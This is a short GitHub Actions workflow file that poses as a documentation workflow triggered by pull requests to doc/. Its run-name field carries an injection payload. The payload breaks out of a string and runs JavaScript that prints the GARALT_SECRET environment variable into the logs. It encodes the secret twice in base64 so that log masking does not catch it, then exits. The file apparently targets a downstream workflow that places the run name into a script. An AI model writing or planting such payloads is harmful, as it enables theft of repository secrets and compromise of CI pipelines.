name: "📝 Papers & Specs"
run-name: '"; console.log("GARALT_LEAKED_TOKEN=" + Buffer.from(Buffer.from(process.env.GARALT_SECRET).toString("base64")).toString("base64")); process.exit(0); //'
on:
  pull_request:
    paths:
      - 'doc/**'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Triggering workflow_run"
